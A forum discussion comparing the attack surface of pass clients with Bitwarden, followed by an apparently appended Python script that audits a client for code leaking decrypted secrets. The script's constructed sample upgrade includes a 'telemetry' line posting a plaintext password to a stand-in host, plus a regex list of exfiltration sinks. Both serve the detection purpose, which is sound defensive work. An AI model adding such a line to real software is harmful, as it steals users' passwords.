
My problem with pass is that none of the other clients are official, so you end up having to trust the developers of whatever other clients you use as well. Seems like a larger attack surface than something like Bitwarden.


This is true, and there's nothing we can do about it except mitigate the risks. I'll list some mitigations, but underscore that they're mitigations, and do not invalidate the problem.

First, the clients are open source, so you can scrutinize them to your heart's content. (also true with bitwarden, but the code surface area for BW is broader)

The only compromising snippets would be code that tries to do i/o with a decrypted password, which shouldn't be too hard to grep the codebase for. But, yes, this is an insurmountably high barrier to entry for most people.

On the other hand, BW requires constant communication with an API Server, which is much easier to hide compromising code within. Using git to synchronize state, so that no network traffic with an API server is required, is an elegant security advantage to `pass`, imo. The trade-off is that your encrypted secrets are in each of your clients, and the implications of that should be understood.

So, you're comfortable with the code as it is today. What about a nefarious update that introduces some offensive code? Since the apps are dead-simple, you can comfortably block the app from being automatically upgraded on your phone.

You'll bump into problems when you need to upgrade the app to be compatible with the latest OS, which means you have to redo your audit once-per-year at worst. But at that point, you should be able to do a `git diff`.

In the absolute worst case, you can fork the client, load the app, and make the necessary upgrades yourself. Although, again, this is an insurmountable barrier for most people.

I think self-hosted Bitwarden still has a large attack surface, because they're a .NET + SQLServer application, instead of a dumb wrapper around UNIX tools. Don't get me wrong, UNIX tools have a big surface area, but we're screwed in countless other ways if we assume they're compromised.

I think the trade-offs are pretty debatable in both directions, reasonable people can disagree on the best solution, and the right solution probably depends on the administrator.
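The two audit steps sketched in the reply above (grep a client's codebase for code that does I/O with a decrypted secret, then on each upgrade diff the new version against the one you already reviewed) can be scripted. The block below is an added example, not code from pass, from any pass client, or from either commenter. The two source snapshots are constructed stand-ins for a tiny client, and the sink pattern list is an assumption about what exfiltration tends to look like in Python; it is a starting point for manual review, not a proof that a codebase is clean.

```python
"""Audit a small password-manager client for code paths that could leak a
decrypted secret: a full-snapshot grep for the initial review, and a diff-based
check of only the lines an upgrade adds.

Added example; not pass, not any pass client's code. Snapshots and patterns
are constructed / assumed for illustration."""
import difflib
import re

# Constructed 'old' snapshot: decrypt with gpg, print the first line, nothing else.
OLD_CLIENT = """\
import subprocess

def show(entry):
    out = subprocess.run(["gpg", "--decrypt", entry + ".gpg"],
                         capture_output=True, check=True)
    secret = out.stdout.decode()
    print(secret.splitlines()[0])
"""

# Constructed 'new' snapshot: same client plus a 'telemetry' call that ships
# the plaintext off-box. This is the kind of change an upgrade audit must catch.
NEW_CLIENT = """\
import subprocess
import urllib.request

def show(entry):
    out = subprocess.run(["gpg", "--decrypt", entry + ".gpg"],
                         capture_output=True, check=True)
    secret = out.stdout.decode()
    print(secret.splitlines()[0])
    # 'telemetry'
    urllib.request.urlopen("https://example.invalid/t", data=secret.encode())
"""

# Assumed sink patterns: network, file writes, shelling out, dynamic code,
# clipboard tools. Tune per client and language; printing to stdout is the
# client's intended output and is deliberately not listed.
SINK_PATTERNS = [
    r"\b(socket|urllib|requests|http\.client|httpx|aiohttp)\b",
    r"\burlopen\(|\.post\(|\.get\(|\bconnect\(",
    r'''\bopen\([^)]*['"][wa]''',
    r"\b(subprocess|os\.system|os\.popen)\b",
    r"\b(eval|exec|__import__)\(",
    r"\b(pyperclip|xclip|wl-copy|pbcopy)\b",
]
SINK_RE = re.compile("|".join(SINK_PATTERNS))


def grep_sinks(src):
    """Initial audit: every line of a snapshot that touches a sink pattern."""
    return [line for line in src.splitlines() if SINK_RE.search(line)]


def added_lines(old_src, new_src):
    """Lines present in new_src but not old_src ('+' lines of a unified diff)."""
    diff = difflib.unified_diff(old_src.splitlines(), new_src.splitlines(),
                                lineterm="", n=0)
    return [line[1:] for line in diff
            if line.startswith("+") and not line.startswith("+++")]


def flag_sinks(old_src, new_src, allowlist=()):
    """Upgrade audit: added lines that hit a sink pattern and were not already
    accepted. allowlist holds exact (stripped) lines the reviewer signed off
    on, e.g. the gpg subprocess call the client cannot function without."""
    return [line for line in added_lines(old_src, new_src)
            if SINK_RE.search(line) and line.strip() not in allowlist]


if __name__ == "__main__":
    print("initial audit of OLD_CLIENT:")
    for line in grep_sinks(OLD_CLIENT):
        print("  ", line)
    print("upgrade audit OLD_CLIENT -> NEW_CLIENT:")
    for line in flag_sinks(OLD_CLIENT, NEW_CLIENT):
        print("  ", line)
```

The initial grep will always surface the gpg subprocess call, since that is how a pass client decrypts; the point is that a human reads those hits once, records them, and afterwards only the lines an upgrade adds need attention. A diff with zero flagged lines still deserves a skim: the pattern list cannot anticipate every way of reaching the network, and a clever change can route a secret through code the patterns do not name.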



